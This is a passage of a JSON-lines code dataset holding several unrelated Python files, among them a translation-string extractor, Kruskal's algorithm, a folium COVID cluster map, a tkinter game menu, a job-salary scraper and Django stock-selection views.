DE_strings.drop_duplicates(keep=\"first\")\n PL_strings_unique = PL_strings.drop_duplicates(keep=\"first\")\n return DE_strings_unique, PL_strings_unique\n\ndef select_untranslated(DE_strings, PL_strings):\n strings_no_PL = pd.DataFrame(columns=[\"datenart\", \"sprache\", \"produktno\", \"navisionid\", \"text\"])\n for index, row in DE_strings.iterrows():\n if row[\"datenart\"] in PL_strings[\"datenart\"].values and \\\n row[\"produktno\"] in PL_strings[\"produktno\"].values and \\\n row[\"navisionid\"] in PL_strings[\"navisionid\"].values:\n DE_string = pd.DataFrame(row).transpose()\n strings_no_PL = pd.concat([strings_no_PL, DE_string], ignore_index=True, axis = 0)\n return strings_no_PL\n\ndef select_strings4trans(strings_no_PL):\n strings4trans = pd.DataFrame(columns=['DE', 'PL'])\n strings4trans[\"DE\"] = strings_no_PL[\"text\"]\n strings4trans[\"PL\"] = \"\"\n strings4trans_unique = strings4trans.drop_duplicates(keep=\"first\")\n return strings4trans_unique\n\ndef find_untrans(files4trans_path, columns):\n '''\n Provide the path to the directory\n with xlsx exports for trans.\n Source cells that require translation\n will be exported\n '''\n\n for file in dir_list: # get all untranslated entries and build separate workbook\n file4trans_path = files4trans_path + file\n wb = openpyxl.load_workbook(file4trans_path)\n \n for tab in wb.sheetnames: #for each worksheet in a workbook\n ws = wb[tab]\n row_limit = ws.max_row+1\n print(f\"Number of rows: {row_limit} \\nCurrent sheet: {ws} \\nCurrent tab: {tab}\")\n \n # verify the names/number of columns in the spreadsheet\n list_with_values=[]\n for cell in ws[1]:\n list_with_values.append(cell.value)\n print(f\"Columns in {tab} tab: {list_with_values}\")\n print(f\"Columns no in {tab} tab: {len(list_with_values)}\")\n \n for transcolumn in columns:\n DE_strings, PL_strings = extract_strings(ws, transcolumn, row_limit)\n strings_no_PL = select_untranslated(DE_strings, PL_strings)\n strings4trans = select_strings4trans(strings_no_PL)\n print(f\"Tab: {tab}, Column: {XLS_COLUMNS[transcolumn]}, unique dataframe head: {strings4trans.head()}\")\n print(f\"Unique dataframe shape: {strings4trans.shape}\")\n \n # save the dataframe to excel\n if strings4trans.shape[0] == 0:\n pass\n else:\n file_path = EXPORTED_COLUMNS + file[:-5] + \"-\" + tab + \"-\" + \"COL\" + \"-\" + str(XLS_COLUMNS[transcolumn]) + \"_unique.xlsx\"\n with pd.ExcelWriter(file_path, engine='openpyxl') as writer:\n strings4trans.to_excel(writer, sheet_name=str(XLS_COLUMNS[transcolumn]), index=False)\n \n\ndir_list = os.listdir(EXPORTS4TRANS) \nif os.path.exists(EXPORTS4TRANS):\n print(f\"Folder {EXPORTS4TRANS} exist.\")\n print(f\"dir_list= {dir_list}\")\n find_untrans(EXPORTS4TRANS, TRANSCOLUMNS)\nelse:\n print(f\"Folder {EXPORTS4TRANS} does not exist.\")\n\n","repo_name":"darstar-ds/SG_scripts","sub_path":"Reuter/find_untrans_split.py","file_name":"find_untrans_split.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5728116797","text":"from networkx.exception import NetworkXNoCycle\nimport networkx as nx\n\nG=nx.Graph() #Create a Graph\n\n#Graph taken from Geeks for Geeks\nconnections = [(0, 1, 4), (0, 7, 8), (1, 7, 11),\n (1, 2, 8), (2, 8, 2), (7, 8, 7), \n (7, 6, 1), (8, 6, 6), (2, 5, 4), \n (6, 5, 2), (2, 3, 7), (3, 5, 14),\n (3, 4, 9), (5, 4, 10), ]\n\nG.add_weighted_edges_from(connections)\ncount=G.number_of_nodes()\nstart=0\nnew_G=nx.Graph()\nc=0\nconnections=sorted(connections,key=lambda tup: tup[2])\n\nwhile c!=count-1:\n\n try:\n edge = [connections[start]]\n new_G.add_weighted_edges_from(edge)\n nx.find_cycle(new_G)\n \n except NetworkXNoCycle:\n c+=1\n \n else:\n new_G.remove_edge(edge[0][0],edge[0][1])\n \n start+=1\n\nprint(new_G.edges)\n","repo_name":"Nirmal-Gopi-R/SDEproblems","sub_path":"greedy/kruskal.py","file_name":"kruskal.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31755671886","text":"\"\"\"Tests for the middlewares of the influxdb_metrics app.\"\"\"\nfrom django.test import TestCase\n\nfrom beagle.client import get_client, NullReporter\n\n\nclass ClientTestCase(TestCase):\n \"\"\"Tests for the ``client`` model.\"\"\"\n\n def test_get_without_api_key(self):\n with self.settings(DATADOG_API_KEY=None):\n client = get_client()\n self.assertIsInstance(client.reporter, NullReporter)\n self.assertTrue(client._disabled)\n\n def test_get_with_api_key(self):\n with self.settings(DATADOG_API_KEY='fdsjkfdshfds'):\n client = get_client()\n self.assertNotIsInstance(client.reporter, NullReporter)\n self.assertFalse(client._disabled)\n","repo_name":"marcusmartins/django-beagle","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31197547899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 6 23:30:33 2021\n\n@author: radhakrishna\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def adjust(self,head:ListNode)->ListNode:\n dh=ListNode()\n dh.next=head\n #insert in the starting so that it can be adjusted towards end.\n #left to right flow.\n #inserted value in starting. check if next node is smaller than this node etc.\n \n current=head\n prev=dh\n #print(dh)\n while(current and current.next):\n #print(dh)\n if(current.val>current.next.val):\n prev.next=current.next\n prev=current.next\n #print(prev.val)\n nex=current.next.next\n current.next.next=current\n current.next=nex\n \n else:\n break\n #print(dh.next)\n return dh.next\n \n def insertionSortList(self, head: ListNode) -> ListNode:\n \n dh=ListNode(head.val)\n dh.next=None\n \n \n if(not head or not head.next):\n return head\n else:\n \n current=head.next\n \n c=0\n while(current):\n #print(current.val)\n #print(dh)\n d=current.next\n current.next=dh\n dh=self.adjust(current)\n current=d\n return dh\n \n ","repo_name":"kssvrk/dsalgos","sub_path":"leetcode/linked_list/insertion_sort_linked_list_147.py","file_name":"insertion_sort_linked_list_147.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2779984303","text":"#GEOCOVID-mstdbscanMap.py\nimport json\nfrom pandas import json_normalize\nimport folium\nimport geopandas as gpd\nimport numpy as np\nimport pandas as pd\nimport os\nimport math\nimport getpass\nfrom sqlalchemy import create_engine\nimport psycopg2 as ps\nfrom folium.plugins import TimestampedGeoJson\nimport calendar\nfrom datetime import date\nfrom shapely.geometry import mapping\nimport branca.colormap as cm\nfrom folium.plugins import FloatImage\nfrom folium import IFrame\nimport base64\n\noutdir='outputs/COVID_MSTDBSCAN/ByDays_1km/'\nresdir='supplementary_materials_paper/supp_mat_6/'\n\n#Open clusterGDF file\ndata=gpd.read_file(outdir+'clusterGDF.gpkg',driver='GPKG')\n#Convert to lat/lon\ndata=data.to_crs({'init': 'epsg:4326'})\n\n#Open diffusionZones\nzones=gpd.read_file(outdir+'diffusionZones.gpkg',driver='GPKG')\n#Convert to lat/lon\nzones=zones.to_crs({'init': 'epsg:4326'})\n\n\n#Convert to_datetime\ndata['mstDate']=pd.to_datetime(data.mstDate,format='%Y-%m-%d')\n\n#CONNECT TO DB WITH user=aladoy\npw=getpass.getpass() #Ask for user password\nengine=create_engine(\"postgresql+psycopg2://aladoy:{}@localhost/geocovid\".format(pw)) #Create SQLAlchemy engine\nconn=ps.connect(\"dbname='geocovid' user='aladoy' host='localhost' password='{}'\".format(pw)) #Create a connection object\ncursor=conn.cursor() #Create a cursor object\n\n\n#TESTS / CASES\ntests=gpd.read_postgis(\"SELECT id_demande, date_reception, charge_virale, ST_X(ST_TRANSFORM(geometry,4326)) AS lon, ST_Y(ST_TRANSFORM(geometry, 4326)) AS lat, geometry FROM covid_tests_vd WHERE res_cov=0\",conn,geom_col='geometry')\ncases=gpd.read_postgis(\"SELECT id_demande, date_reception, charge_virale, ST_X(ST_TRANSFORM(geometry,4326)) AS lon, ST_Y(ST_TRANSFORM(geometry, 4326)) AS lat, geometry FROM covid_tests_vd WHERE res_cov=1\",conn,geom_col='geometry')\n\n\n#Extract Lat/Lon corresponding to the center of the canton\ncursor.execute(\"SELECT ST_X(ST_Transform(ST_Centroid(ST_Union(geometry)),4326)) FROM cantons WHERE name='Vaud'\")\nx=cursor.fetchone()[0]\ncursor.execute(\"SELECT ST_Y(ST_Transform(ST_Centroid(ST_Union(geometry)),4326)) FROM cantons WHERE name='Vaud'\")\ny=cursor.fetchone()[0]\nprint(x,y)\n\n#Create dic for colors\ncolors={'Emerge':'#fb9a99','Growth':\"#e31a1c\", 'Steady':\"#33a02c\", 'Merge':\"#ffffb3\", 'Move':\"#fdb462\", 'Split':\"#bebada\", 'Reduction':\"#1f78b4\"}\ndata['colorHEX'] = data['type'].map(colors)\n\ndef create_geojson_features(df):\n features = []\n for idx, row in df.iterrows():\n feature = {\n 'type': 'Feature',\n 'geometry': {\n 'type':'Polygon',\n 'coordinates':mapping(df.loc[idx].geometry)['coordinates']\n },\n 'properties': {\n 'time': pd.to_datetime(row['mstDate'], unit='D').__str__(),\n 'style': {'color' : row['colorHEX'], 'opacity':0.7, 'fillOpacity':0.7},\n 'popup': 'Cluster ID: ' + str(row['clusterID']) + '
    Type: ' + row['type']\n }\n }\n features.append(feature)\n return features\n\n#Define colors for diffusion zones\ncolors = {'1':'#A0CF8D', '2':'#FFC04C', '3':'#B0E0E6', 'no clusters':'#cccccc'}\nzones['color']=zones['DZ'].map(colors)\n\n#Map\ndef make_map(features):\n coords_vd=[y, x]\n mstdbscan_map = folium.Map(location=coords_vd, control_scale=True, zoom_start=9,tiles='cartodbpositron')\n\n folium.GeoJson(\n zones,\n style_function = lambda x: {\"weight\":0.5,\n 'color':'#cccccc',\n 'fillColor':x['properties']['color'],\n 'fillOpacity':0.4}).add_to(mstdbscan_map)\n\n # for i in range(0, len(tests)):\n # folium.Circle(\n # location=[tests.iloc[i]['lat'], tests.iloc[i]['lon']],\n # radius=1,\n # color='#000000',\n # fill=True,\n # fillColor='#000000'\n # ).add_to(mstdbscan_map)\n\n # for i in range(0, len(cases)):\n # folium.Circle(\n # location=[cases.iloc[i]['lat'], cases.iloc[i]['lon']],\n # radius=1,\n # color='#66b266',\n # fill=True,\n # fillColor='#66b266',\n # popup=cases.iloc[i]['date_reception']\n # ).add_to(mstdbscan_map)\n\n TimestampedGeoJson(\n {'type': 'FeatureCollection',\n 'features': features}\n , period='P1D'\n , duration = 'PT23H'\n , transition_time=1000\n , add_last_point=True\n , auto_play=False\n , loop=False\n , max_speed=1\n , loop_button=True\n , time_slider_drag_update=True\n ).add_to(mstdbscan_map)\n\n #image=outdir+'legend_interactive_map.png'\n #encoded = base64.b64encode(open(image, 'rb').read())\n #ADD title\n html=\"
    \\\n
    \\\n \\\n
    \"\n mstdbscan_map.get_root().html.add_child(folium.Element(html))\n\n print('> Done.')\n return mstdbscan_map\n\nfeatures = create_geojson_features(data)\nmstdbscan_map=make_map(features)\nmstdbscan_map.save(resdir+'Supp_Mat_6.html')\n","repo_name":"aladoy/GEOCOVID-phase1","sub_path":"src/GEOCOVID-mstdbscanMap.py","file_name":"GEOCOVID-mstdbscanMap.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10281138268","text":"from tkinter import *\n\n\ndef start_main_page():\n def start_game(args):\n main_window.destroy()\n if args == 1:\n from packages import APPS\n APPS.main()\n elif args == 2:\n from packages import PROGRAMS\n PROGRAMS.main()\n elif args == 3:\n from packages import PC\n PC.main()\n elif args == 4:\n from packages import GAMES1\n GAMES1.main()\n elif args == 5:\n from packages import OS\n OS.main()\n elif args == 6:\n from packages import ANTIVIRUS\n ANTIVIRUS.main()\n\n def option():\n\n lab_img1 = Button(\n main_window,\n text=\"Select\",\n bg='#0066ff',\n border=0,\n justify='center',\n font=(\"Arial\", 12)\n\n )\n sel_btn1 = Button(\n text=\"APPS\",\n width=20,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#ff3333\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(1),\n )\n\n sel_btn2 = Button(\n text=\"PROGRAMS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(2),\n )\n\n sel_btn3 = Button(\n text=\"PC\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(3),\n )\n\n sel_btn4 = Button(\n text=\"GAMES1\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(4),\n )\n\n sel_btn5 = Button(\n text=\"OS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(5),\n )\n\n sel_btn6 = Button(\n text=\"ANTIVIRUS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(6),\n )\n\n lab_img1.grid(row=0, column=0, padx=20)\n sel_btn1.grid(row=0, column=4, pady=(10, 0), padx=50, )\n sel_btn2.grid(row=1, column=4, pady=(10, 0), padx=50, )\n sel_btn3.grid(row=2, column=4, pady=(10, 0), padx=50, )\n sel_btn4.grid(row=3, column=4, pady=(10, 0), padx=50, )\n sel_btn5.grid(row=4, column=4, pady=(10, 0), padx=50, )\n sel_btn6.grid(row=5, column=4, pady=(10, 0), padx=50, )\n\n def show_option():\n start_btn.destroy()\n\n lab_img.destroy()\n option()\n\n main_window = Tk()\n\n main_window.geometry(\"500x500+500+150\")\n main_window.resizable(0, 0)\n main_window.title(\"Guess the Word\")\n main_window.configure(background=\"#0066ff\")\n \n\n img1 = PhotoImage(file=\"back.png\")\n\n lab_img = Label(\n main_window,\n text=\"Guess the Word Game\",\n bg='#0066ff',\n font=(\"Courier\", 28)\n )\n lab_img.pack(pady=(50, 0))\n\n start_btn = Button(\n main_window,\n text=\"Start\",\n width=18,\n borderwidth=8,\n fg=\"#000000\",\n bg=\"#99ffd6\",\n font=(\"\", 13),\n cursor=\"hand2\",\n command=show_option,\n )\n start_btn.pack(pady=(50, 20))\n\n main_window.mainloop()\n\n\nstart_main_page()\n","repo_name":"raghulkarthik/PROJECTS","sub_path":"projects/Guessing Word/Python game project.py","file_name":"Python game project.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"400211433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport copy\nclass Noh:\n indice = None\n inicio = None\n fim = None\n peso = None\n pilhaParenteses = None\n\n def __init__(self, indice, inicio, fim, peso, pilhaParenteses):\n self.indice = indice\n self.inicio = inicio\n self.fim = fim\n self.peso = peso\n self.pilhaParenteses = copy.copy(pilhaParenteses)\n \n def getDadosNoh(self):\n saida = \"indice : \" + str(self.indice) + \" inicio : \" + str(self.inicio) + \\\n \", fim : \" + str(self.fim) + \" peso : \" + str(self.peso) + \\\n \" parenteses : \" + str(self.pilhaParenteses) + \"\\n\"\n return saida","repo_name":"k4t0mono/regex-to-code","sub_path":"ERparaAFND/Noh.py","file_name":"Noh.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34177252734","text":"import os\n\nfrom dotenv import load_dotenv\nimport requests\nfrom itertools import count\nfrom collections import defaultdict\n\nfrom predict_salary import predict_rub_salary\n\n\nLANGUAGES = [\n 'Python',\n 'Java',\n 'JavaScript',\n 'PHP',\n 'Ruby',\n 'C++',\n 'TypeScript',\n 'C#'\n]\n\n\ndef get_sj_vacancies(sj_key, language='Python', page=0):\n headers = {'X-Api-App-Id': sj_key}\n url = 'https://api.superjob.ru/2.0/vacancies/'\n params = {\n 'period': 30,\n 'catalogues': 48,\n 'town': '4',\n 'keyword': language,\n 'page': page\n }\n\n response = requests.get(url, headers=headers, params=params)\n response.raise_for_status()\n\n return response.json()\n\n\ndef collect_sj_language_statistics(language, sj_key):\n all_average_salaries = []\n found = 0\n\n for page in count(0, 1):\n decoded_response = get_sj_vacancies(sj_key, language, page=page)\n\n for salary in decoded_response['objects']:\n if salary['payment_from'] or salary['payment_to']:\n if salary['currency'] == 'rub':\n salary_rub = predict_rub_salary(\n salary['payment_from'],\n salary['payment_to']\n )\n all_average_salaries.append(salary_rub)\n\n if not decoded_response['more']:\n break\n\n found = decoded_response[\"total\"]\n\n salary_sum = int(sum(all_average_salaries) / len(all_average_salaries))\n used_count = len(all_average_salaries)\n\n statistics = {\n 'average_salary': salary_sum,\n 'vacancies_found': found,\n 'vacancies_processed': used_count\n }\n\n return statistics\n\n\ndef get_sj_language_statistics(languages):\n statistics = defaultdict()\n sj_key = os.getenv('SJ_KEY')\n\n for language in languages:\n statistics[language] = collect_sj_language_statistics(language, sj_key)\n\n return statistics\n\n\ndef main():\n load_dotenv()\n\n print(get_sj_language_statistics(LANGUAGES))\n\n\nif __name__ == '__main__':\n main()","repo_name":"CapitanDonD/job_seeker","sub_path":"sj.py","file_name":"sj.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41928377443","text":"import csv\nf = open('finalData.csv', 'r')\nff = open('final.csv', 'a+')\nf_csv = csv.reader(f)\nff_csv = csv.writer(ff)\ni = 1\n\nfor row in f_csv:\n\tif i % 8 == 7:\n\t\t#print row\n\t\tff_csv.writerow(row)\n\ti = i+1\n\nf.close()\nff.close()\n\n","repo_name":"XINZHEYU/New-York-MTA-Optimization-System","sub_path":"code/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"197740329","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import News, KmeansData, CashFlowData, Name_Id, KStockList, CStockList, VisitData\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\nfrom django.db.models import Q\n# from .select_strategy import *\nfrom django.views.decorators.cache import cache_page\n\n# from django.db.models import Count\n\nnow = datetime.now() # 现在时刻,月日年时分秒\nnow_date = now.date() # 现在时刻,月日年\nyesterday = now + timedelta(days=-1) # 昨天\nthe_day_before_yesterday = now + timedelta(days=-2) # 前天\nday_fixed_before_news = now + timedelta(days=-30) # 10天前的消息自动从数据库中删除\nday_fixed_before_kdata = now_date + timedelta(days=-121) # 4个月前的k线图数据从数据库中删除\nday_fixed_before_cdata = now_date + timedelta(days=-121) # 4个月前的资金流数据从数据库中删除\nday_fixed_before_visit = now + timedelta(days=-5) # 5天前的访客数据从数据库中删除\n\n\n# Create your views here.\ndef index(request): # 处理主页的视图逻辑\n visitcount(request)\n return render(request, 'choose_stock/index.html', {})\n\n\ndef news(request): # 处理消息页面的视图逻辑\n visitcount(request)\n news_dated = News.objects.filter(published_time__lte=day_fixed_before_news) # 筛选出发布时间在特定天数前的过时消息\n news_dated.delete() # 删除消息\n context_dict = {} # 上下文字典\n news_today_pos = News.objects.filter(published_time__day=now.day, published_time__month=now.month,\n flag_pn=1).order_by(\n '-published_time') # 提取出今日新闻利好列表,既查询,又排序,链接过滤器好\n context_dict['news_today_pos'] = news_today_pos\n news_today_neg = News.objects.filter(published_time__day=now.day, published_time__month=now.month,\n flag_pn=0).order_by(\n '-published_time') # 提取今日利空新闻列表\n context_dict['news_today_neg'] = news_today_neg\n news_yes_pos = News.objects.filter(published_time__day=yesterday.day, published_time__month=yesterday.month,\n flag_pn=1).order_by(\n '-published_time') # 提取昨日利好新闻列表\n context_dict['news_yes_pos'] = news_yes_pos\n news_yes_neg = News.objects.filter(published_time__day=yesterday.day, published_time__month=yesterday.month,\n flag_pn=0).order_by(\n '-published_time') # 提取昨日利空新闻列表\n context_dict['news_yes_neg'] = news_yes_neg\n news_be_yes_pos = News.objects.filter(published_time__day=the_day_before_yesterday.day,\n published_time__month=the_day_before_yesterday.month, flag_pn=1).order_by(\n '-published_time') # 提取前日利好新闻列表\n context_dict['news_be_yes_pos'] = news_be_yes_pos\n news_be_yes_neg = News.objects.filter(published_time__day=the_day_before_yesterday.day,\n published_time__month=the_day_before_yesterday.month, flag_pn=0).order_by(\n '-published_time') # 提取前日利空新闻列表\n context_dict['news_be_yes_neg'] = news_be_yes_neg\n return render(request, 'choose_stock/news.html', context_dict)\n\n\ndef news_detail(request, pk): # 显示具体新闻的视图逻辑, pk指新闻存储在mysql数据库中的id(用pk做传递参数是否存在安全隐患?)\n visitcount(request)\n context_dict = {} # 需要传递进模板中的上下文参数字典\n try:\n news = News.objects.get(pk=pk)\n context_dict['news'] = news\n except News.DoesNotExist:\n pass\n return render(request, 'choose_stock/news_detail.html', context_dict)\n\n\n# --------------------------------------------------------以下为与kmeans相关的函数\ndef ChangeToEchartsData_kdata(stock_id_list=['000705', '300016', '002090']): # 将特定代码的股票数据转换为符合echarts的数据\n stocks = KmeansData.objects.filter(stock_id__in=stock_id_list).order_by('stock_date')\n # stocks = KmeansData.objects.filter(stock_id__in=['600612', '002060', '601988']).order_by('stock_date') # 利用老凤祥测试下\n stock_seen = list({(stock.stock_id, stock.stock_name) for stock in stocks}) # 去重用,���得不重名的stock_id\n stocks_new = [] # 添加每支重构后的股票\n for id_name in stock_seen:\n stock = {} # 重构每支股票数据\n stock['stock_id'] = id_name[0]\n stock['name'] = id_name[1]\n data = [[str(s.stock_date),\n float(s.price_open) if float(s.price_open) > 0 else float(s.price_close),\n float(s.price_close),\n float(s.price_low) if float(s.price_low) > 0 else float(s.price_close),\n float(s.price_high) if float(s.price_high) > 0 else float(s.price_close)]\n for s in stocks if s.stock_id == id_name[0]] # 目前暂时只能用此种方式(注意列表内含列表),echarts要求,画K线图的4个数据一定为浮点数\n\n # 获取涨跌幅数据,目前暂用最普通的方法\n sc = [s.price_close for s in stocks if s.stock_id == id_name[0]] # 获取所有的收盘价格\n yy = [] # 储存涨跌数据\n for x in range(len(sc) - 1):\n try:\n y = (float(sc[x + 1]) - float(sc[x])) / float(sc[x])\n yy.append('{:.2%}'.format(y))\n except Exception:\n yy.append('0.00%')\n zz = ['0.00%']\n zz.extend(yy) # 完整的涨跌幅数据\n # zz = CashFlowData.objects.filter(stock_id=id_name[0]).order_by('stock_date').values_list('var_degree', flat=True)\n for x in range(len(zz)):\n data[x].append(zz[x])\n\n stock['data'] = data\n\n # 将涨跌的volumn分开\n volumn_data = [int(s.stock_volumn) for s in stocks if s.stock_id == id_name[0]] # 获取该股票对应的成交量数据\n volumn_rise = []\n volumn_fall = []\n for x in range(len(data)):\n close_minus_open = data[x][2] - data[x][1]\n if close_minus_open > 0: # 收盘价大于开盘价,此时volumn为涨,红色\n volumn_rise.append(volumn_data[x])\n volumn_fall.append('-')\n else:\n volumn_rise.append('-')\n volumn_fall.append(volumn_data[x])\n\n stock['volumn_rise'] = volumn_rise\n stock['volumn_fall'] = volumn_fall\n\n # stock['volumn'] = [int(s.stock_volumn) for s in stocks if s.stock_id == id_name[0]]\n # k += 1\n stocks_new.append(stock)\n return stocks_new\n\n\ndef KmeansStrategy1(): # 根据策略:跌-跌-涨-涨,最后一天下影线越短越好 选择符合要求的股票\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3) = KmeansData.objects.filter(stock_id='601988').dates(\n 'stock_date', 'day', order='DESC')[:5] # 提取中国银行的倒数第四个交易日,作为所有股票的倒数第四个交易日,本行第一个数字为控制变量,默认且最小为4.\n\n judge_3 = KmeansData.objects.filter(stock_date=tradeday_3).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第四个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第四日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n # tradeday_2 = tradeday_3 + timedelta(days=1) # 倒数第3日\n judge_2 = KmeansData.objects.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id',\n 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日绿色股票代码\n # tradeday_1 = tradeday_2 + timedelta(days=1) # 倒数第2日\n judge_1 = KmeansData.objects.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第二个交易日股票数据, 含成交量数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n # tradeday_0 = tradeday_1 + timedelta(days=1) # 倒数第1日\n judge_0 = KmeansData.objects.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找到倒数第1日红色股票代码中,成交量较倒数第二日成交量增加的股票代码\n sid_volumn = [] # 储存通过成交量增长判定得到的股票代码\n for s_id in stock_id_list0:\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == s_id] # judge_1中的volumn\n volumn0 = [int(s[3]) for s in judge_0 if s[0] == s_id] # judge_0中的volumn\n if volumn0[0] > volumn1[0]:\n sid_volumn.append(s_id)\n\n return sid_volumn\n\n\ndef KmeansStrategy2(): # 根据策略:跌-跌-涨,要求最后一天无下影线, 且成交量最好上升\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :3] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n judge_2 = KmeansData.objects.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n # tradeday_1 = tradeday_2 + timedelta(days=1) # 倒数第2日----此种方法是错误的,有可能包含了周六或日\n judge_1 = KmeansData.objects.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n # tradeday_0 = tradeday_1 + timedelta(days=1) # 倒数第1日\n judge_0 = KmeansData.objects.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] == sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n return sid_stock\n\n\ndef KmeansStrategy2_1(index_day=3): # KmeansStrategy2的改进版,希望可以提高运行效率,核心为只调用一次数据库筛选\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 